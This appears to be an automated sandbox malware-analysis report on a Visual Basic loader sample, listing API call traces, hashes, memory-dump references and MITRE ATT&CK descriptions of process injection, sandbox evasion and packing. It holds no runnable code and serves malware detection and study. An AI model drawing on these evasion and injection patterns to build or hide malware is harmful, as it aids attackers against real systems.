Associated: 00000000.00000002.927326965.000000000042E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$#651#680CallLateList
String ID: $$$Behovsundersgelsernes$Out of string space$R6uEaLZZXnxq88
API String ID: 2237795304-3706703187
Opcode ID: e79851f5281e74b8c34c6f70582e01e3c1123a38913a8ddd5ad5e1d9ac3d38cb
Instruction ID: 1855c8d006b5f51b5b17a12d25ebe1c0a919abcf6e7248a5ed7c9c9561b0a47e
Opcode Fuzzy Hash: e79851f5281e74b8c34c6f70582e01e3c1123a38913a8ddd5ad5e1d9ac3d38cb
Instruction Fuzzy Hash: 26A16071A01218AFDB14EF94ED88E9EBBB8FF48704F10816AE805B7291D7745D45CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00429980, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

#588.MSVBVM60(00000002,00000001,00000000), ref: 00429A01
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 00429A24
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 00429A4F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,00000068), ref: 00429A7A
__vbaFreeObj.MSVBVM60 ref: 00429A7F
#610.MSVBVM60(?), ref: 00429A89
#552.MSVBVM60(?,?,00000001), ref: 00429A99
__vbaVarMove.MSVBVM60 ref: 00429AA5
__vbaFreeVar.MSVBVM60 ref: 00429AAE
__vbaVarDup.MSVBVM60 ref: 00429B11
#596.MSVBVM60(?,?,?,?,?,?,?), ref: 00429B3C
__vbaStrMove.MSVBVM60 ref: 00429B47
__vbaFreeVarList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 00429B74
__vbaNew2.MSVBVM60(00401CE8,0042E010), ref: 00429B98
__vbaObjSet.MSVBVM60(?,00000000), ref: 00429BB1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028B4,0000022C), ref: 00429BD4
__vbaFreeObj.MSVBVM60 ref: 00429BD9
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 00429BF1
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 00429C16
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,000000F0), ref: 00429C3C
__vbaStrMove.MSVBVM60 ref: 00429C47
__vbaFreeObj.MSVBVM60 ref: 00429C50
__vbaNew2.MSVBVM60(00401CE8,0042E010), ref: 00429C69
__vbaObjSet.MSVBVM60(?,00000000), ref: 00429C82
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402894,00000058), ref: 00429CA6
__vbaFreeObj.MSVBVM60 ref: 00429CB4
__vbaFreeStr.MSVBVM60(00429D1E), ref: 00429D0D
__vbaFreeVar.MSVBVM60 ref: 00429D12
__vbaFreeStr.MSVBVM60 ref: 00429D1B

Strings

ASSERTORICALLY, xrefs: 00429AFD

Memory Dump Source

Source File: 00000000.00000002.927202138.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.927189268.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.927326965.000000000042E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$#552#588#596#610List
String ID: ASSERTORICALLY
API String ID: 645633489-2689121510
Opcode ID: e269041f170f8714c3d03dd176cdaaba4ab64cd89ef09831c94fbae15ad9d60d
Instruction ID: 0dda0bb4da8c590541b71f83aebc8a10b2e173f4d608944ab60d31d0c4964543
Opcode Fuzzy Hash: e269041f170f8714c3d03dd176cdaaba4ab64cd89ef09831c94fbae15ad9d60d
Instruction Fuzzy Hash: 02B15B71E00218EFCB14DF95ED88EDEBBB8BF48300F10856AE559B72A0DA745945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00428D70, Relevance: 37.7, APIs: 25, Instructions: 212COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 00428DD4
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 00428DFF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,00000078), ref: 00428E27
__vbaFreeObj.MSVBVM60 ref: 00428E2C
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 00428E44
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,0000004C), ref: 00428E69
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402854,00000020), ref: 00428E89
__vbaFreeObj.MSVBVM60 ref: 00428E9C
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 00428EBD
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 00428EE2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,00000060), ref: 00428F02
__vbaStrMove.MSVBVM60 ref: 00428F13
__vbaFreeObj.MSVBVM60 ref: 00428F18
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 00428F28
__vbaStrVarMove.MSVBVM60(?), ref: 00428F32
__vbaStrMove.MSVBVM60 ref: 00428F3D
__vbaFreeVar.MSVBVM60 ref: 00428F42
__vbaNew2.MSVBVM60(00401CE8,0042E010), ref: 00428F5B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00428F74
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028B4,000001E0), ref: 00428F9B
#580.MSVBVM60(?,00000001), ref: 00428FA3
__vbaFreeStr.MSVBVM60 ref: 00428FAC
__vbaFreeObj.MSVBVM60 ref: 00428FB5
__vbaFreeStr.MSVBVM60(00428FFD), ref: 00428FF5
__vbaFreeStr.MSVBVM60 ref: 00428FFA

Memory Dump Source

Source File: 00000000.00000002.927202138.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.927189268.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.927326965.000000000042E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$#539#580
String ID:
API String ID: 2092569307-0
Opcode ID: ec3dffd3dcabb5cbbcde3927fb3ad09c58e5b350666dd08a538b06765370ea6f
Instruction ID: 91914f825c42efa66e6091b1c3f5d5d7dc5e7fcb3204dfadedb1f5e745684382
Opcode Fuzzy Hash: ec3dffd3dcabb5cbbcde3927fb3ad09c58e5b350666dd08a538b06765370ea6f
Instruction Fuzzy Hash: BA717F71A01228AFCB10EFA5DD88E9EBBB8FF08714B54452EF501F72A0DA745945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00429710, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

__vbaI4Str.MSVBVM60(00402A04), ref: 0042977F
#697.MSVBVM60(00000000), ref: 00429786
__vbaStrMove.MSVBVM60 ref: 00429797
__vbaStrCmp.MSVBVM60(00402A10,00000000), ref: 0042979F
__vbaFreeStr.MSVBVM60 ref: 004297B2
#706.MSVBVM60(00000001,00000000,00000000), ref: 004297C5
__vbaStrMove.MSVBVM60 ref: 004297D0
__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 004297E4
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 00429809
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,000000F0), ref: 00429833
__vbaStrMove.MSVBVM60 ref: 00429842
__vbaFreeObj.MSVBVM60 ref: 00429847
__vbaVarDup.MSVBVM60 ref: 004298A1
#596.MSVBVM60(?,?,?,?,?,?,?), ref: 004298C9
__vbaStrMove.MSVBVM60 ref: 004298D4
__vbaFreeVarList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 004298FA
__vbaFreeStr.MSVBVM60(00429960), ref: 00429953
__vbaFreeStr.MSVBVM60 ref: 00429958
__vbaFreeStr.MSVBVM60 ref: 0042995D

Strings

skrpper, xrefs: 0042988D

Memory Dump Source

Source File: 00000000.00000002.927202138.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.927189268.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.927326965.000000000042E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$#596#697#706ListNew2
String ID: skrpper
API String ID: 1949233303-948051648
Opcode ID: 05dc359687a5558b6911b2b6dae816f39bfbc0dfc9f4315ac6e4adfc9ea64df1
Instruction ID: 9d93a06a8ff26a90ecc90a1057427efe5802ecffccdab87a8ecb7661dd6133a3
Opcode Fuzzy Hash: 05dc359687a5558b6911b2b6dae816f39bfbc0dfc9f4315ac6e4adfc9ea64df1
Instruction Fuzzy Hash: FF610BB1D002189FCB15DFA4DD84ADEBBB8FF58300F10816AE54AB72A0DB745A89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0042CD10, Relevance: 18.1, APIs: 12, Instructions: 128COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00401CE8,0042E010,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 0042CD69
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 0042CD86
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028A4,000001C4), ref: 0042CDAF
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 0042CDBC
__vbaNew2.MSVBVM60(0040280C,0042E3A4,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 0042CDD5
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 0042CDF6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,00000068), ref: 0042CE16
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 0042CE1B
__vbaNew2.MSVBVM60(00401CE8,0042E010,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 0042CE34
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 0042CE49
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028A4,00000128), ref: 0042CE70
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 0042CE7B

Memory Dump Source

Source File: 00000000.00000002.927202138.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.927189268.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.927326965.000000000042E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2
String ID:
API String ID: 4261391273-0
Opcode ID: 3719038c702a0609a4ca0ebca5bf8706ddf767cbbcd0192ab89f94dd300a83cd
Instruction ID: c3e6d251329bb658f8f5efc00cd05e14b403b97d44863616120e790196d1e8b5
Opcode Fuzzy Hash: 3719038c702a0609a4ca0ebca5bf8706ddf767cbbcd0192ab89f94dd300a83cd
Instruction Fuzzy Hash: C7417271640214AFCB10DFA5DD88E9EBBF8FF58700B50446AE445F72A0D6B89845CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0042CF50, Relevance: 16.6, APIs: 11, Instructions: 90COMMON

Download Yara Rule

APIs

#632.MSVBVM60(?,?,00000000,?), ref: 0042CFB0
__vbaStrVarVal.MSVBVM60(?,?), ref: 0042CFBE
#516.MSVBVM60(00000000), ref: 0042CFC5
__vbaFreeStr.MSVBVM60 ref: 0042CFDB
__vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0042CFEB
#617.MSVBVM60(00000002,?,000000FF), ref: 0042D00C
#617.MSVBVM60(00000002,?,00000000), ref: 0042D02A
__vbaStrVarMove.MSVBVM60(00000002), ref: 0042D034
__vbaStrMove.MSVBVM60 ref: 0042D03F
__vbaFreeVar.MSVBVM60 ref: 0042D048
__vbaFreeStr.MSVBVM60(0042D07C), ref: 0042D075

Memory Dump Source

Source File: 00000000.00000002.927202138.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.927189268.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.927326965.000000000042E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#617Move$#516#632List
String ID:
API String ID: 3155365896-0
Opcode ID: a868b507df4db336d34779e1c37765bc674c0ecd1bf06a2889836c4f378545f5
Instruction ID: b492cf1edbdb7032d3473c3ebafead9bd1add9f94751b3f04e4eb50e365869ed
Opcode Fuzzy Hash: a868b507df4db336d34779e1c37765bc674c0ecd1bf06a2889836c4f378545f5
Instruction Fuzzy Hash: 1A312CB1C00269EBCB14DFE4ED88DEEBBB8FF58705F00422AE602B6564D774154ACB94

Uniqueness

Uniqueness Score: -1.00%

Function 0042CBB0, Relevance: 12.1, APIs: 8, Instructions: 98COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0040280C,0042E3A4), ref: 0042CBF4
__vbaHresultCheckObj.MSVBVM60(00000000,02BBEA7C,004027FC,00000014), ref: 0042CC1F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040281C,00000108), ref: 0042CC4D
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 0042CC52
__vbaNew2.MSVBVM60(00401CE8,0042E010), ref: 0042CC6B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042CC84
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028C4,0000012C), ref: 0042CCC7
__vbaFreeObj.MSVBVM60 ref: 0042CCCC

Memory Dump Source

Source File: 00000000.00000002.927202138.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.927189268.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.927326965.000000000042E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2
String ID:
API String ID: 4261391273-0
Opcode ID: bf0a30d49b466d76355864cee55231eb22bcba073278b1eb516aa023297523fd
Instruction ID: e2219219ed622f2237d6a7781e03d74531a1374461c6ce611504dd95642b263c
Opcode Fuzzy Hash: bf0a30d49b466d76355864cee55231eb22bcba073278b1eb516aa023297523fd
Instruction Fuzzy Hash: A431D471A00214AFC714EF95ED88E9E7BB8FF08700F50453AF945FB2A0D6789845CBA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 466XoziOLD.exe PID: 6324 Parent PID: 6952 466XoziOLD.exeCOMMON

Executed Functions

Function 0056E5C9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 0056E668

Strings

'F"^, xrefs: 0056E641

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID: 'F"^
API String ID: 2706961497-1138197306
Opcode ID: d35c873797a4d355c374d6cc83d6c67db3e84f5f8ae2ddc60eedbc72a68fe89a
Instruction ID: dabd1abbb07ea4ffee88247fbbc4f469601cccfc3d7146042cb86312f6e49764
Opcode Fuzzy Hash: d35c873797a4d355c374d6cc83d6c67db3e84f5f8ae2ddc60eedbc72a68fe89a
Instruction Fuzzy Hash: 2D11AFB90013029FDB109E68CA57BA73E64FF34354F5247A5EC82CB2D2E375D4838525

Uniqueness

Uniqueness Score: -1.00%

Function 0056E5B7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 0056E668

Strings

'F"^, xrefs: 0056E641

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID: 'F"^
API String ID: 2706961497-1138197306
Opcode ID: 1657029c1cfa18016ca42689aecdfe3b14049c5bda7b4e5c562a49dce31e204a
Instruction ID: 569070cc9683216997624d80fec40b80ddd2eaeaa20a4c51032241c060474a07
Opcode Fuzzy Hash: 1657029c1cfa18016ca42689aecdfe3b14049c5bda7b4e5c562a49dce31e204a
Instruction Fuzzy Hash: 30114CF80013019FDB508F54C996B573F64FF39720F2247A9ED458B2E2D376E8428A55

Uniqueness

Uniqueness Score: -1.00%

Function 0056E590, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 0056E668

Strings

'F"^, xrefs: 0056E641

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID: 'F"^
API String ID: 2706961497-1138197306
Opcode ID: 6783b2ba521781a8c9cff4d41fc56cbb234e14a4fb6dfe52ad1bed818d90b4af
Instruction ID: 104c7bc41411ca9df13babe33f66e4b915c981dd268ed500a0097aeb5bbae181
Opcode Fuzzy Hash: 6783b2ba521781a8c9cff4d41fc56cbb234e14a4fb6dfe52ad1bed818d90b4af
Instruction Fuzzy Hash: 381129B91013019FDB508F28C996B5B3B60FF74724F120795DC428F1E2D376E8828A55

Uniqueness

Uniqueness Score: -1.00%

Function 0056E608, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 0056E668

Strings

'F"^, xrefs: 0056E641

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID: 'F"^
API String ID: 2706961497-1138197306
Opcode ID: fbf858dc8f38ed91f30725de0117e5e0fb18c9076e8b2c29b9a02b343e52dbec
Instruction ID: 75236d862694181f947d28f935eb911d4081950f37bd3f2ed816202cb0526cdf
Opcode Fuzzy Hash: fbf858dc8f38ed91f30725de0117e5e0fb18c9076e8b2c29b9a02b343e52dbec
Instruction Fuzzy Hash: D501F2B20013019FD7808F28C996A6B7B60FF24720B224798DD85CB4E2D376E4438A15

Uniqueness

Uniqueness Score: -1.00%

Function 0056E5FD, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 0056E668

Strings

'F"^, xrefs: 0056E641

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID: 'F"^
API String ID: 2706961497-1138197306
Opcode ID: 9bd9c724cca8ddb9611e5ae0e5059c628b22bfea9e6ee2c57065c977691da148
Instruction ID: 82af9701d34ff9d11db40578deb95b98002922a07832b6b8985206492500a4bf
Opcode Fuzzy Hash: 9bd9c724cca8ddb9611e5ae0e5059c628b22bfea9e6ee2c57065c977691da148
Instruction Fuzzy Hash: A6F0F6F60053119FD7808F588A15B677A64FF2572472247AADC86CB192D335D4428945

Uniqueness

Uniqueness Score: -1.00%

Function 0056E734, Relevance: 3.0, APIs: 2, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 0056E7A5

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 328a358f30c231a9e06ce4710a107987d58d897073655c08aec856db877dde5b
Instruction ID: cd4160d4dedebde528a651197f5aecb5417b3a489a6a5facfc56f3d0001cec46
Opcode Fuzzy Hash: 328a358f30c231a9e06ce4710a107987d58d897073655c08aec856db877dde5b
Instruction Fuzzy Hash: EF012170505341DFE7245B35C98EB9A7BA1FF243A1F298284E5528B0F6C3B8C8818B22

Uniqueness

Uniqueness Score: -1.00%

Function 0056E678, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 0056E668

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6a71e3e960ca331b8fa8037c96b6c468b8e4a9a7e344e98332e55c733d2daf45
Instruction ID: bf214fed01a6289115d1fc5a2a6e7b3c3154ef339e0972c569a357c932047e7f
Opcode Fuzzy Hash: 6a71e3e960ca331b8fa8037c96b6c468b8e4a9a7e344e98332e55c733d2daf45
Instruction Fuzzy Hash: AF01767B1162024ADF408E78DA563D77A60EF316787A54A66DCA2CB5D2E728D0034180

Uniqueness

Uniqueness Score: -1.00%

Function 0056E460, Relevance: 1.6, APIs: 1, Instructions: 102threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 0056E41D

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 52351d1199667478b690afb9483686b23e64f329d7450722ee851ffe657ee81d
Instruction ID: eeba78795a57298e5014c2cb56ec28abb2fc8b9c68c028a995f329a0d54dfd7f
Opcode Fuzzy Hash: 52351d1199667478b690afb9483686b23e64f329d7450722ee851ffe657ee81d
Instruction Fuzzy Hash: 612137796183438BCF209F38C8867F5BBF1EFA1390F19056AD8C54B251CB3495468742

Uniqueness

Uniqueness Score: -1.00%

Function 0056E362, Relevance: 1.6, APIs: 1, Instructions: 87threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 0056E41D

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: c60538f891e47a8d0ad0eb0260a9b58ae251d4ac817ec72e9301fcac838e76de
Instruction ID: a6b16345b9c979ffe46713029ec9c98c0e7a51468587f05300f67d73f3e71ad6
Opcode Fuzzy Hash: c60538f891e47a8d0ad0eb0260a9b58ae251d4ac817ec72e9301fcac838e76de
Instruction Fuzzy Hash: 6C1106796083578BCF209F38C4857E6BBF2EFA0380F59816ACCC98B255DB3485869716

Uniqueness

Uniqueness Score: -1.00%

Function 0056E400, Relevance: 1.5, APIs: 1, Instructions: 41threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 0056E41D

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: c24ca776f0477476831b69c86932d100e75916759d4943b7dfdc5028348d062f
Instruction ID: 0e13c41b45e597ff39211daa4ef56c10470fbe220875f0f39d3f236c9651286e
Opcode Fuzzy Hash: c24ca776f0477476831b69c86932d100e75916759d4943b7dfdc5028348d062f
Instruction Fuzzy Hash: EB01683920C6824ACF51DF78C4867AAFBA1BF91290F0C86AED4C98B192CF249481D743

Uniqueness

Uniqueness Score: -1.00%

Function 0056E414, Relevance: 1.5, APIs: 1, Instructions: 26threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 0056E41D

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: a16e3151e033407f62c30dee1a14cb1b78e0d12502004c003a5a169f4aac0a35
Instruction ID: 148b781704afd77a1b2a9f79234ac4f9a1af13d30a2fc11f7c2bb844a3e45ae1
Opcode Fuzzy Hash: a16e3151e033407f62c30dee1a14cb1b78e0d12502004c003a5a169f4aac0a35
Instruction Fuzzy Hash: 8BF02E782083524BDF50DF7980857A2F7E2AF50280F08C1BAD4898B251DF24C485D712

Uniqueness

Uniqueness Score: -1.00%

Function 0056E760, Relevance: 1.3, APIs: 1, Instructions: 33sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 0056E7A5

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 743f59a787b9a885ec00e7f02f7bde729229bdf0d768b9ea771ef54696cfd171
Instruction ID: 99b8d5dea31bfec0e719239e495a115b088d38df143683da37c85fc568ab5fa2
Opcode Fuzzy Hash: 743f59a787b9a885ec00e7f02f7bde729229bdf0d768b9ea771ef54696cfd171
Instruction Fuzzy Hash: D1F05C7A6293419FEF64AF7CC08EBC17B62FF20731F5D4690C6454B0B29735A882D622

Uniqueness

Uniqueness Score: -1.00%

Function 0056E71F, Relevance: 1.3, APIs: 1, Instructions: 32sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 0056E7A5

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: af8dc5f920a952733dd174510588422f3ade2cd3b2f38d32654c37cf6f7fdc3c
Instruction ID: bfeb9fc24097403ee60c02cf04260c3ce1f4c63adf00150f4e44c286e27feb1f
Opcode Fuzzy Hash: af8dc5f920a952733dd174510588422f3ade2cd3b2f38d32654c37cf6f7fdc3c
Instruction Fuzzy Hash: 49F02E286253439BFF247768C19EBD63A72FF207B1F994194DD464B0969F21C483C122

Uniqueness

Uniqueness Score: -1.00%

Function 0056E774, Relevance: 1.3, APIs: 1, Instructions: 18sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 0056E7A5
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056E7E5

Memory Dump Source

Source File: 0000000E.00000002.1182999081.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: f664056a3537e457b7a079425b53ab19bbb21b60c5347665216c7bf6bc835d94
Instruction ID: 8c1a168269b1e0b0445e8b967e68ef2410c4d46555e208328fbb82d091e52c65
Opcode Fuzzy Hash: f664056a3537e457b7a079425b53ab19bbb21b60c5347665216c7bf6bc835d94
Instruction Fuzzy Hash: 66D0C236A113028FEB246E78C54AB9A7762FF06721B560588C8114B0A1C3728483CA12

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

